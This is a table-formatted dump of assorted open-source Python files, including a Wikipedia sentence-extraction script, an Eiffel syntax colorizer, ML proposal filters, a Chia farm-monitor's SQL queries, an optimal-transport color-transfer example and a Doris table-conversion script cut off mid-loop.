max_stars_repo_path (string, length 4–245) | max_stars_repo_name (string, length 7–115) | max_stars_count (int64, 101–368k) | id (string, length 2–8) | content (string, length 6–1.03M)
---|---|---|---|---|
vaurien/tests/test_util.py | mozilla-libs/vaurien | 131 | 12663443 | <reponame>mozilla-libs/vaurien<gh_stars>100-1000
import unittest
from vaurien.util import chunked
class TestUtil(unittest.TestCase):
def test_chunked(self):
self.assertEqual(sum(list(chunked(7634, 2049))), 7634)
|
data_utils/extraction.py | lcylcy/GLM_copa | 212 | 12663479 | <reponame>lcylcy/GLM_copa
import nltk
import glob
import json
import os
nltk.download('punkt')
class NLTKSegmenter:
def __init__(self):
pass
@staticmethod
def segment_string(article):
return nltk.tokenize.sent_tokenize(article)
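# The loop below walks WikiExtractor-style output: each wiki_* file holds
# articles delimited by <doc id=...> / </doc> markers. Every article line is
# sentence-split; the first sentence of a multi-sentence line becomes a "key"
# sentence and the rest its "content", while single-sentence lines either
# start the next key or extend the current content. One JSON object per
# article ({"key": [...], "content": [...]}) is written per output line.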
wiki_path = "data/extracted"
output_path = "formatted/wiki-key.txt"
segmenter = NLTKSegmenter()
with open(output_path, "w") as output:
for dirname in glob.glob(os.path.join(wiki_path, '*'), recursive=False):
for filename in glob.glob(os.path.join(dirname, 'wiki_*'), recursive=True):
print(filename)
article_lines = []
article_open = False
with open(filename, mode='r', newline='\n') as file:
for line in file:
line = line.rstrip()
if '<doc id=' in line:
article_open = True
elif '</doc>' in line:
key_sentences, contents = [], []
key, content = None, []
for sentences in article_lines[1:]:
if len(sentences) > 1:
if key:
if len(content) > 0 or len(contents) == 0:
key_sentences.append(key)
contents.append(content)
else:
contents[-1].append(key)
key, content = None, []
key_sentences.append(sentences[0])
contents.append(sentences[1:])
elif len(sentences) > 0:
if key:
content.append(sentences[0])
else:
key = sentences[0]
if key:
if len(content) > 0 or len(contents) == 0:
key_sentences.append(key)
contents.append(content)
else:
contents[-1].append(key)
contents = [" ".join(content) for content in contents]
article = {"key": key_sentences, "content": contents}
output.write(json.dumps(article))
output.write("\n")
article_open = False
article_lines = []
else:
if article_open and line:
sentences = segmenter.segment_string(line)
article_lines.append(sentences)
|
ctc_fast/decoder/setup.py | SrikarSiddarth/stanford-ctc | 268 | 12663498 | <filename>ctc_fast/decoder/setup.py
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
setup(
cmdclass = {'build_ext': build_ext},
ext_modules = [Extension("bg_decoder", ["bg_decoder.pyx"]),
Extension("clm_decoder", ["clm_decoder.pyx"]),
Extension("clm_decoder2", ["clm_decoder2.pyx"])]
)
|
leo/modes/eiffel.py | ATikhonov2/leo-editor | 1,550 | 12663508 | <filename>leo/modes/eiffel.py
# Leo colorizer control file for eiffel mode.
# This file is in the public domain.
# Properties for eiffel mode.
properties = {
"lineComment": "--",
}
# Attributes dict for eiffel_main ruleset.
eiffel_main_attributes_dict = {
"default": "null",
"digit_re": "",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "true",
"no_word_sep": "",
}
# Dictionary of attributes dictionaries for eiffel mode.
attributesDictDict = {
"eiffel_main": eiffel_main_attributes_dict,
}
# Keywords dict for eiffel_main ruleset.
eiffel_main_keywords_dict = {
"alias": "keyword1",
"all": "keyword1",
"and": "keyword1",
"as": "keyword1",
"check": "keyword1",
"class": "keyword1",
"creation": "keyword1",
"current": "literal2",
"debug": "keyword1",
"deferred": "keyword1",
"do": "keyword1",
"else": "keyword1",
"elseif": "keyword1",
"end": "keyword1",
"ensure": "keyword1",
"expanded": "keyword1",
"export": "keyword1",
"external": "keyword1",
"false": "literal2",
"feature": "keyword1",
"from": "keyword1",
"frozen": "keyword1",
"if": "keyword1",
"implies": "keyword1",
"indexing": "keyword1",
"infix": "keyword1",
"inherit": "keyword1",
"inspect": "keyword1",
"invariant": "keyword1",
"is": "keyword1",
"like": "keyword1",
"local": "keyword1",
"loop": "keyword1",
"not": "keyword1",
"obsolete": "keyword1",
"old": "keyword1",
"once": "keyword1",
"or": "keyword1",
"precursor": "literal2",
"prefix": "keyword1",
"redefine": "keyword1",
"rename": "keyword1",
"require": "keyword1",
"rescue": "keyword1",
"result": "literal2",
"retry": "keyword1",
"select": "keyword1",
"separate": "keyword1",
"strip": "literal2",
"then": "keyword1",
"true": "literal2",
"undefine": "keyword1",
"unique": "literal2",
"until": "keyword1",
"variant": "keyword1",
"void": "literal2",
"when": "keyword1",
"xor": "keyword1",
}
# Dictionary of keywords dictionaries for eiffel mode.
keywordsDictDict = {
"eiffel_main": eiffel_main_keywords_dict,
}
# Rules for eiffel_main ruleset.
def eiffel_rule0(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment1", seq="--",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def eiffel_rule1(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def eiffel_rule2(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="'", end="'",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def eiffel_rule3(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for eiffel_main ruleset.
rulesDict1 = {
"\"": [eiffel_rule1,],
"'": [eiffel_rule2,],
"-": [eiffel_rule0,],
"0": [eiffel_rule3,],
"1": [eiffel_rule3,],
"2": [eiffel_rule3,],
"3": [eiffel_rule3,],
"4": [eiffel_rule3,],
"5": [eiffel_rule3,],
"6": [eiffel_rule3,],
"7": [eiffel_rule3,],
"8": [eiffel_rule3,],
"9": [eiffel_rule3,],
"@": [eiffel_rule3,],
"A": [eiffel_rule3,],
"B": [eiffel_rule3,],
"C": [eiffel_rule3,],
"D": [eiffel_rule3,],
"E": [eiffel_rule3,],
"F": [eiffel_rule3,],
"G": [eiffel_rule3,],
"H": [eiffel_rule3,],
"I": [eiffel_rule3,],
"J": [eiffel_rule3,],
"K": [eiffel_rule3,],
"L": [eiffel_rule3,],
"M": [eiffel_rule3,],
"N": [eiffel_rule3,],
"O": [eiffel_rule3,],
"P": [eiffel_rule3,],
"Q": [eiffel_rule3,],
"R": [eiffel_rule3,],
"S": [eiffel_rule3,],
"T": [eiffel_rule3,],
"U": [eiffel_rule3,],
"V": [eiffel_rule3,],
"W": [eiffel_rule3,],
"X": [eiffel_rule3,],
"Y": [eiffel_rule3,],
"Z": [eiffel_rule3,],
"a": [eiffel_rule3,],
"b": [eiffel_rule3,],
"c": [eiffel_rule3,],
"d": [eiffel_rule3,],
"e": [eiffel_rule3,],
"f": [eiffel_rule3,],
"g": [eiffel_rule3,],
"h": [eiffel_rule3,],
"i": [eiffel_rule3,],
"j": [eiffel_rule3,],
"k": [eiffel_rule3,],
"l": [eiffel_rule3,],
"m": [eiffel_rule3,],
"n": [eiffel_rule3,],
"o": [eiffel_rule3,],
"p": [eiffel_rule3,],
"q": [eiffel_rule3,],
"r": [eiffel_rule3,],
"s": [eiffel_rule3,],
"t": [eiffel_rule3,],
"u": [eiffel_rule3,],
"v": [eiffel_rule3,],
"w": [eiffel_rule3,],
"x": [eiffel_rule3,],
"y": [eiffel_rule3,],
"z": [eiffel_rule3,],
}
# x.rulesDictDict for eiffel mode.
rulesDictDict = {
"eiffel_main": rulesDict1,
}
# Import dict for eiffel mode.
importDict = {}
|
axcell/models/linking/proposals_filters.py | Kabongosalomon/axcell | 335 | 12663509 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from ...pipeline_logger import pipeline_logger
import pandas as pd
from enum import Enum
class FilterOutReason(Enum):
TrainDataset = "train-dataset"
DevDataset = "dev-dataset"
EmptyModelName = "empty-model-name"
ModelCompeting = "model-competing"
class ProposalsFilter:
step = "proposals_filtering"
def _filter(self, proposals):
raise NotImplementedError
def filter(self, proposals):
which, reason = self._filter(proposals)
self.log(proposals=proposals, which=which, reason=reason)
return which, reason
def __rshift__(self, other):
return CompoundFilter([self, other])
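# `>>` lets filters be chained, e.g. (illustrative values only):
# StructurePredictionFilter() >> ConfidenceFilter(confidence=0.5)
# builds a CompoundFilter that applies both in sequence.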
def __call__(self, proposals):
which, reason = self.filter(proposals)
return proposals[which]
def log(self, **kwargs):
pipeline_logger(f"filtering::{self.step}::filtered", **kwargs)
class CompoundFilter(ProposalsFilter):
step = "compound_filtering"
def __init__(self, filters):
self.filters = filters
def _filter(self, proposals):
agg_which = pd.Series(data=True, index=proposals.index)
agg_reason = pd.Series(data="", index=proposals.index)
for f in self.filters:
which, reason = f.filter(proposals)
agg_reason[agg_which & ~which] = reason
agg_which &= which
proposals = proposals[which]
return agg_which, agg_reason[~agg_which]
class NopFilter(ProposalsFilter):
step = "nop_filtering"
def _filter(self, proposals):
which = pd.Series(data=True, index=proposals.index)
reason = pd.Series(dtype=object)
return which, reason
# filter proposals for which structure prediction
# * was unable to find model type or
# * found dataset cell containing "dev" or "train"
# this filter could be applied before taxonomy linking,
# but to make error analysis easier it's applied after
class StructurePredictionFilter(ProposalsFilter):
step = "structure_filtering"
def _filter(self, proposals):
which = (proposals.struct_model_type != '') \
& ~proposals.struct_dataset.str.contains('dev') \
& ~proposals.struct_dataset.str.contains('train')
reason = pd.Series(data="", index=proposals.index)
reason[proposals.struct_dataset.str.contains('train')] = "train-dataset"
reason[proposals.struct_dataset.str.contains('dev')] = "dev-dataset"
reason[proposals.struct_model_type == ''] = "empty-model-type"
return which, reason[~which]
class ConfidenceFilter(ProposalsFilter):
step = "confidence_filtering"
def __init__(self, confidence=-1):
self.confidence = confidence
def _filter(self, proposals):
which = proposals.confidence >= self.confidence
reason = "confidence " + proposals[~which].confidence.round(2).astype(str) + f" < {self.confidence}"
return which, reason[~which]
def log(self, **kwargs):
super().log(**kwargs, confidence=self.confidence)
class BestResultFilter(ProposalsFilter):
step = "best_result_filtering"
def __init__(self, taxonomy, context="paper"):
assert context in ["paper", "table"]
self.metrics_info = taxonomy.metrics_info
self.context = context
def _filter(self, proposals):
reason = pd.Series(data="", index=proposals.index)
indices = []
if self.context == "paper":
context_column = proposals.index.to_series().str.split('/', expand=False).apply(lambda x: x[0])
else:
context_column = proposals.index.to_series().str.split('/', expand=False).apply(lambda x: x[0] + "/" + x[1])
for key_all, group in proposals[(proposals.model_type == 'model-best') & ~proposals.parsed.isna()].groupby(
by=["dataset", "metric", "task", context_column]):
dataset, metric, task, paper = key_all
key = (task, dataset, metric)
d = 0
if key in self.metrics_info:
d = self.metrics_info[key]
elif metric in self.metrics_info:
d = self.metrics_info[metric]
elif 'error' in metric.lower():
d = -1
elif 'accuracy' in metric.lower():
d = 1
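# d encodes the assumed metric direction: d >= 0 means higher is better
# (keep the row with the maximum parsed value), d < 0 means lower is
# better, e.g. error metrics (keep the minimum).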
if d >= 0:
index = group.parsed.idxmax()
else:
index = group.parsed.idxmin()
indices.append(index)
reason[group.index[group.index != index]] = "replaced by " + str(index)
reason[proposals.struct_model_type == 'model-competing'] = "model-competing"
which = proposals.index.to_series().isin(indices)
return which, reason[~which]
def log(self, **kwargs):
super().log(**kwargs, context=self.context)
|
tests/test_header.py | michkoll/python-evtx | 525 | 12663585 | <gh_stars>100-1000
from fixtures import *
import Evtx.Evtx as evtx
def test_file_header(system):
'''
regression test parsing some known fields in the file header.
Args:
system (bytes): the system.evtx test file contents. pytest fixture.
'''
fh = evtx.FileHeader(system, 0x0)
# collected empirically
assert fh.magic() == 'ElfFile\x00'
assert fh.major_version() == 0x3
assert fh.minor_version() == 0x1
assert fh.flags() == 0x1
assert fh.is_dirty() is True
assert fh.is_full() is False
assert fh.current_chunk_number() == 0x8
assert fh.chunk_count() == 0x9
assert fh.oldest_chunk() == 0x0
assert fh.next_record_number() == 0x34d8
assert fh.checksum() == 0x41b4b1ec
assert fh.calculate_checksum() == fh.checksum()
def test_file_header2(security):
'''
regression test parsing some known fields in the file header.
Args:
security (bytes): the security.evtx test file contents. pytest fixture.
'''
fh = evtx.FileHeader(security, 0x0)
# collected empirically
assert fh.magic() == 'ElfFile\x00'
assert fh.major_version() == 0x3
assert fh.minor_version() == 0x1
assert fh.flags() == 0x1
assert fh.is_dirty() is True
assert fh.is_full() is False
assert fh.current_chunk_number() == 0x19
assert fh.chunk_count() == 0x1a
assert fh.oldest_chunk() == 0x0
assert fh.next_record_number() == 0x8b2
assert fh.checksum() == 0x3f6e33d5
assert fh.calculate_checksum() == fh.checksum()
|
monitor/database/queries.py | philippnormann/chia-monitor | 148 | 12663594 | from datetime import datetime, timedelta
from typing import Optional, Tuple
from monitor.database.events import (BlockchainStateEvent, ConnectionsEvent, FarmingInfoEvent,
HarvesterPlotsEvent, SignagePointEvent, WalletBalanceEvent)
from sqlalchemy.orm import Session
from sqlalchemy.sql.expression import select
from sqlalchemy.sql.functions import func
def get_proofs_found(session: Session) -> Optional[int]:
result = session.execute(select(func.sum(FarmingInfoEvent.proofs)))
return result.scalars().first()
def get_harvester_count(session: Session) -> Optional[int]:
result = session.execute(
select(ConnectionsEvent.harvester_count).order_by(ConnectionsEvent.ts.desc()))
return result.scalars().first()
def get_sync_status(session: Session) -> Optional[bool]:
result = session.execute(
select(BlockchainStateEvent.synced).order_by(BlockchainStateEvent.ts.desc()))
return result.scalars().first()
def get_blockchain_state(session: Session) -> Optional[BlockchainStateEvent]:
result = session.execute(select(BlockchainStateEvent).order_by(BlockchainStateEvent.ts.desc()))
return result.scalars().first()
def get_wallet_balance(session: Session) -> Optional[WalletBalanceEvent]:
result = session.execute(select(WalletBalanceEvent).order_by(WalletBalanceEvent.ts.desc()))
return result.scalars().first()
def get_connections(session: Session) -> Optional[ConnectionsEvent]:
result = session.execute(select(ConnectionsEvent).order_by(ConnectionsEvent.ts.desc()))
return result.scalars().first()
def get_farming_start(session: Session) -> Optional[datetime]:
result = session.execute(select(func.min(FarmingInfoEvent.ts)))
return result.scalars().first()
def get_previous_signage_point(session: Session) -> Optional[str]:
result = session.execute(
select(FarmingInfoEvent.signage_point).order_by(FarmingInfoEvent.ts.desc()).distinct(
FarmingInfoEvent.signage_point).limit(2))
return result.all()[-1][0]
def get_plot_delta(session: Session, period=timedelta(hours=24)) -> Tuple[int, int]:
result = session.execute(select(func.min(HarvesterPlotsEvent.ts)))
first_ts = result.scalars().first()
if first_ts is None:
return 0, 0
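# Clamp the window start to the first recorded sample so a database younger
# than `period` still produces a sensible delta.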
initial_ts = max(first_ts, datetime.now() - period)
sub_query = select([
HarvesterPlotsEvent.plot_count, HarvesterPlotsEvent.portable_plot_count,
HarvesterPlotsEvent.plot_size, HarvesterPlotsEvent.portable_plot_size
]).where(HarvesterPlotsEvent.ts > initial_ts).order_by(HarvesterPlotsEvent.ts).group_by(
HarvesterPlotsEvent.host)
result = session.execute(
select([
func.sum(sub_query.c.plot_count),
func.sum(sub_query.c.portable_plot_count),
func.sum(sub_query.c.plot_size),
func.sum(sub_query.c.portable_plot_size)
]))
initial_plots = result.one()
if initial_plots is None:
return 0, 0
initial_og_plot_count, initial_portable_plot_count, initial_og_plot_size, initial_portable_plot_size = initial_plots
initial_plot_count = initial_og_plot_count + initial_portable_plot_count
initial_plot_size = initial_og_plot_size + initial_portable_plot_size
current_plot_count = get_plot_count(session)
if current_plot_count is None:
return 0, 0
current_plot_size = get_plot_size(session)
if current_plot_size is None:
return 0, 0
return current_plot_count - initial_plot_count, current_plot_size - initial_plot_size
def get_plot_count(session: Session) -> Optional[int]:
og_plot_count = get_og_plot_count(session)
portable_plot_count = get_portable_plot_count(session)
if og_plot_count is not None and portable_plot_count is not None:
return og_plot_count + portable_plot_count
elif og_plot_count is not None and portable_plot_count is None:
return og_plot_count
elif og_plot_count is None and portable_plot_count is not None:
return portable_plot_count
else:
return None
def get_plot_size(session: Session) -> Optional[int]:
og_plot_size = get_og_plot_size(session)
portable_plot_size = get_portable_plot_size(session)
if og_plot_size is not None and portable_plot_size is not None:
return og_plot_size + portable_plot_size
elif og_plot_size is not None and portable_plot_size is None:
return og_plot_size
elif og_plot_size is None and portable_plot_size is not None:
return portable_plot_size
else:
return None
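# The four helpers below share one pattern: take each harvester host's most
# recent sample (any event from the last 30 seconds) and sum the per-host
# maxima to get a cluster-wide total.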
def get_og_plot_size(session: Session) -> Optional[int]:
sub_query = select([
func.max(HarvesterPlotsEvent.plot_size).label("plot_size")
]).where(HarvesterPlotsEvent.ts > datetime.now() - timedelta(seconds=30)).group_by(
HarvesterPlotsEvent.host)
result = session.execute(select(func.sum(sub_query.c.plot_size)))
return result.scalars().first()
def get_og_plot_count(session: Session) -> Optional[int]:
sub_query = select([
func.max(HarvesterPlotsEvent.plot_count).label("plot_count")
]).where(HarvesterPlotsEvent.ts > datetime.now() - timedelta(seconds=30)).group_by(
HarvesterPlotsEvent.host)
result = session.execute(select(func.sum(sub_query.c.plot_count)))
return result.scalars().first()
def get_portable_plot_size(session: Session) -> Optional[int]:
sub_query = select([
func.max(HarvesterPlotsEvent.portable_plot_size).label("portable_plot_size")
]).where(HarvesterPlotsEvent.ts > datetime.now() - timedelta(seconds=30)).group_by(
HarvesterPlotsEvent.host)
result = session.execute(select(func.sum(sub_query.c.portable_plot_size)))
return result.scalars().first()
def get_portable_plot_count(session: Session) -> Optional[int]:
sub_query = select([
func.max(HarvesterPlotsEvent.portable_plot_count).label("portable_plot_count")
]).where(HarvesterPlotsEvent.ts > datetime.now() - timedelta(seconds=30)).group_by(
HarvesterPlotsEvent.host)
result = session.execute(select(func.sum(sub_query.c.portable_plot_count)))
return result.scalars().first()
def get_signage_points_per_minute(session: Session, interval: timedelta) -> Optional[float]:
result = session.execute(
select(func.count(
SignagePointEvent.ts)).where(SignagePointEvent.ts >= datetime.now() - interval))
num_signage_points = result.scalars().first()
if num_signage_points is None:
return None
return num_signage_points / (interval.seconds / 60)
def get_passed_filters_per_minute(session: Session, interval: timedelta) -> Optional[float]:
result = session.execute(
select(func.sum(
FarmingInfoEvent.passed_filter)).where(FarmingInfoEvent.ts >= datetime.now() - interval))
passed_filters = result.scalars().first()
if passed_filters is None:
return None
return passed_filters / (interval.seconds / 60)
def get_current_balance(session: Session) -> int:
result = session.execute(select(WalletBalanceEvent.confirmed).order_by(WalletBalanceEvent.ts.desc()))
return result.scalars().first()
def get_last_payment(session: Session) -> int:
current_balance = get_current_balance(session)
previous_balance_query = session.execute(
select(WalletBalanceEvent.confirmed).where(
WalletBalanceEvent.confirmed != current_balance).order_by(WalletBalanceEvent.ts.desc()))
last_balance = previous_balance_query.scalars().first()
return int(current_balance) - int(last_balance)
|
examples/domain-adaptation/plot_otda_color_images.py | Pseudomanifold/POT | 830 | 12663609 | # -*- coding: utf-8 -*-
"""
=============================
OT for image color adaptation
=============================
This example presents a way of transferring colors between two images
with Optimal Transport as introduced in [6]
[6] <NAME>., <NAME>., <NAME>., & <NAME>. (2014).
Regularized discrete optimal transport.
SIAM Journal on Imaging Sciences, 7(3), 1853-1882.
"""
# Authors: <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: MIT License
# sphinx_gallery_thumbnail_number = 2
import os
from pathlib import Path
import numpy as np
from matplotlib import pyplot as plt
import ot
rng = np.random.RandomState(42)
def im2mat(img):
"""Converts an image to matrix (one pixel per line)"""
return img.reshape((img.shape[0] * img.shape[1], img.shape[2]))
def mat2im(X, shape):
"""Converts back a matrix to an image"""
return X.reshape(shape)
def minmax(img):
return np.clip(img, 0, 1)
##############################################################################
# Generate data
# -------------
# Loading images
this_file = os.path.realpath('__file__')
data_path = os.path.join(Path(this_file).parent.parent.parent, 'data')
I1 = plt.imread(os.path.join(data_path, 'ocean_day.jpg')).astype(np.float64) / 256
I2 = plt.imread(os.path.join(data_path, 'ocean_sunset.jpg')).astype(np.float64) / 256
X1 = im2mat(I1)
X2 = im2mat(I2)
# training samples
nb = 500
idx1 = rng.randint(X1.shape[0], size=(nb,))
idx2 = rng.randint(X2.shape[0], size=(nb,))
Xs = X1[idx1, :]
Xt = X2[idx2, :]
##############################################################################
# Plot original image
# -------------------
plt.figure(1, figsize=(6.4, 3))
plt.subplot(1, 2, 1)
plt.imshow(I1)
plt.axis('off')
plt.title('Image 1')
plt.subplot(1, 2, 2)
plt.imshow(I2)
plt.axis('off')
plt.title('Image 2')
##############################################################################
# Scatter plot of colors
# ----------------------
plt.figure(2, figsize=(6.4, 3))
plt.subplot(1, 2, 1)
plt.scatter(Xs[:, 0], Xs[:, 2], c=Xs)
plt.axis([0, 1, 0, 1])
plt.xlabel('Red')
plt.ylabel('Blue')
plt.title('Image 1')
plt.subplot(1, 2, 2)
plt.scatter(Xt[:, 0], Xt[:, 2], c=Xt)
plt.axis([0, 1, 0, 1])
plt.xlabel('Red')
plt.ylabel('Blue')
plt.title('Image 2')
plt.tight_layout()
##############################################################################
# Instantiate the different transport algorithms and fit them
# -----------------------------------------------------------
# EMDTransport
ot_emd = ot.da.EMDTransport()
ot_emd.fit(Xs=Xs, Xt=Xt)
# SinkhornTransport
ot_sinkhorn = ot.da.SinkhornTransport(reg_e=1e-1)
ot_sinkhorn.fit(Xs=Xs, Xt=Xt)
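# Note: SinkhornTransport adds entropic regularization (reg_e), which yields a
# smoother coupling than the exact EMD plan at the cost of some blurring.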
# prediction between images (using out of sample prediction as in [6])
transp_Xs_emd = ot_emd.transform(Xs=X1)
transp_Xt_emd = ot_emd.inverse_transform(Xt=X2)
transp_Xs_sinkhorn = ot_sinkhorn.transform(Xs=X1)
transp_Xt_sinkhorn = ot_sinkhorn.inverse_transform(Xt=X2)
I1t = minmax(mat2im(transp_Xs_emd, I1.shape))
I2t = minmax(mat2im(transp_Xt_emd, I2.shape))
I1te = minmax(mat2im(transp_Xs_sinkhorn, I1.shape))
I2te = minmax(mat2im(transp_Xt_sinkhorn, I2.shape))
##############################################################################
# Plot new images
# ---------------
plt.figure(3, figsize=(8, 4))
plt.subplot(2, 3, 1)
plt.imshow(I1)
plt.axis('off')
plt.title('Image 1')
plt.subplot(2, 3, 2)
plt.imshow(I1t)
plt.axis('off')
plt.title('Image 1 Adapt')
plt.subplot(2, 3, 3)
plt.imshow(I1te)
plt.axis('off')
plt.title('Image 1 Adapt (reg)')
plt.subplot(2, 3, 4)
plt.imshow(I2)
plt.axis('off')
plt.title('Image 2')
plt.subplot(2, 3, 5)
plt.imshow(I2t)
plt.axis('off')
plt.title('Image 2 Adapt')
plt.subplot(2, 3, 6)
plt.imshow(I2te)
plt.axis('off')
plt.title('Image 2 Adapt (reg)')
plt.tight_layout()
plt.show()
|
janome/__init__.py | narupo/janome | 748 | 12663647 | <filename>janome/__init__.py
from janome.version import JANOME_VERSION as __version__
__all__ = [
"__version__",
]
|
PyObjCTest/test_nsenumerator.py | Khan/pyobjc-framework-Cocoa | 132 | 12663656 | from PyObjCTools.TestSupport import *
import objc
from Foundation import *
import Foundation
class TestNSEnumeratorInteraction(TestCase):
def setUp(self):
self.arrayContainer = NSArray.arrayWithArray_(range(100))
def testNoFastEnumeration(self):
self.assertNotHasAttr(Foundation, 'NSFastEnumerationState')
def testInOperator(self):
y = []
for x in self.arrayContainer.objectEnumerator():
y.append(x)
self.assertEqual(len(y), len(self.arrayContainer))
for i in range(len(y)):
self.assertEqual(y[i], self.arrayContainer[i])
if __name__ == '__main__':
main( )
|
src/offazure/azext_offazure/vendored_sdks/offazure/models/_azure_migrate_v2_enums.py | Mannan2812/azure-cli-extensions | 207 | 12663664 | <gh_stars>100-1000
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from enum import Enum, EnumMeta
from six import with_metaclass
class _CaseInsensitiveEnumMeta(EnumMeta):
def __getitem__(self, name):
return super().__getitem__(name.upper())
def __getattr__(cls, name):
"""Return the enum member matching `name`
We use __getattr__ instead of descriptors or inserting into the enum
class' __dict__ in order to support `name` and `value` being both
properties for enum members (which live in the class' __dict__) and
enum members themselves.
"""
try:
return cls._member_map_[name.upper()]
except KeyError:
raise AttributeError(name)
class AgentConfigurationRebootStatus(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
REBOOTED = "rebooted"
NOT_REBOOTED = "notRebooted"
class CredentialType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Credential type of the run as account.
"""
V_MWARE_FABRIC = "VMwareFabric"
HYPER_V_FABRIC = "HyperVFabric"
LINUX_GUEST = "LinuxGuest"
WINDOWS_GUEST = "WindowsGuest"
LINUX_SERVER = "LinuxServer"
WINDOWS_SERVER = "WindowsServer"
class HighlyAvailable(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Value indicating whether the VM is highly available.
"""
UNKNOWN = "Unknown"
NO = "No"
YES = "Yes"
class HypervisorConfigurationHypervisorType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
HYPERV = "hyperv"
class MachinePropertiesMonitoringState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
MONITORED = "monitored"
DISCOVERED = "discovered"
class MachinePropertiesVirtualizationState(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
PHYSICAL = "physical"
VIRTUAL = "virtual"
HYPERVISOR = "hypervisor"
class MachineResourcesConfigurationCpuSpeedAccuracy(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ACTUAL = "actual"
ESTIMATED = "estimated"
class OperatingSystemConfigurationBitness(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
THIRTY_TWO_BIT = "32bit"
SIXTY_FOUR_BIT = "64bit"
class OperatingSystemConfigurationFamily(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
WINDOWS = "windows"
LINUX = "linux"
SOLARIS = "solaris"
AIX = "aix"
class VirtualDiskMode(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
"""Disk mode property used for identifying independent disks.
"""
PERSISTENT = "persistent"
INDEPENDENT_PERSISTENT = "independent_persistent"
INDEPENDENT_NONPERSISTENT = "independent_nonpersistent"
NONPERSISTENT = "nonpersistent"
UNDOABLE = "undoable"
APPEND = "append"
class VirtualMachineConfigurationVirtualMachineType(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
UNKNOWN = "unknown"
HYPERV = "hyperv"
LDOM = "ldom"
LPAR = "lpar"
VMWARE = "vmware"
VIRTUAL_PC = "virtualPc"
XEN = "xen"
|
tests/test_mock.py | zyfra/ebonite | 270 | 12663692 | <gh_stars>100-1000
import pytest
from tests.conftest import MockMixin
class A:
def method(self):
"""aaaa"""
def method2(self):
return 2
class B(A, MockMixin):
def method(self):
return 1
def test_mock_mixin():
b = B()
assert b.method() == 1
b.method.assert_called()
assert b.method2() == 2
b.method2.assert_called()
def test_mock_mixin__2_instances():
b1 = B()
b2 = B()
assert b1.method() == 1
b1.method.assert_called()
b2.method.assert_not_called()
def test_mock_call_context():
b1 = B()
with pytest.raises(AssertionError):
with b1.method.called_within_context():
pass
with b1.method.called_within_context():
b1.method()
with pytest.raises(AssertionError):
with b1.method.called_within_context():
b1.method()
with b1.method.called_within_context(first=False):
b1.method()
with pytest.raises(AssertionError):
with b1.method.called_within_context(first=False, times=2):
b1.method()
with b1.method.called_within_context(first=False, times=2):
b1.method()
b1.method()
|
sphinxcontrib/napoleon/_upstream.py | SimBioSysInc/napoleon | 124 | 12663700 | # -*- coding: utf-8 -*-
"""
sphinxcontrib.napoleon._upstream
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Functions to help compatibility with upstream sphinx.ext.napoleon.
:copyright: Copyright 2013-2018 by <NAME>, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
def _(message, *args):
"""
NOOP implementation of sphinx.locale.get_translation shortcut.
"""
return message
|
tools/row_to_column/convert_row_to_column.py | kaiker19/incubator-doris | 3,562 | 12663714 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ConfigParser
import json
import os
import re
import sys
import time
from urllib import urlopen
import MySQLdb
class convert_row_to_column(object):
def connect(self, host, port, http_port, username, password):
"""
Use MySQLdb to connect to PALO
"""
self.host = host
self.port = port
self.http_port = http_port
self.username = username
self.passwd = password
try:
self.db = MySQLdb.connect(host=self.host, port=self.port,
user=self.username,
passwd=self.passwd)
self.cur = self.db.cursor()
except MySQLdb.Error as e:
print ("error %s:%s" % (str(e.args[0]), e.args[1]))
def close(self):
if self.db.open:
self.cur.close()
self.db.close()
def run(self):
url_list = "http://%s:%s@%s:%s/api/_get_ddl?db=default_cluster" % (
self.username, self.passwd, self.host, self.http_port)
url = None
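# For every database and table, fetch the CREATE TABLE statement from the FE
# HTTP _get_ddl endpoint and print an ALTER TABLE ... set("storage_type"="column")
# statement for any table still declared with "storage_type" = "ROW".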
show_databases_sql = "show databases"
self.cur.execute(show_databases_sql)
databases = self.cur.fetchall()
for database_tuple in databases :
#for database in ["habo_db", "tieba_recommend"]:
database = database_tuple[0]
show_tables_sql = "show tables from `" + database + "`"
self.cur.execute(show_tables_sql)
for table_tuple in self.cur:
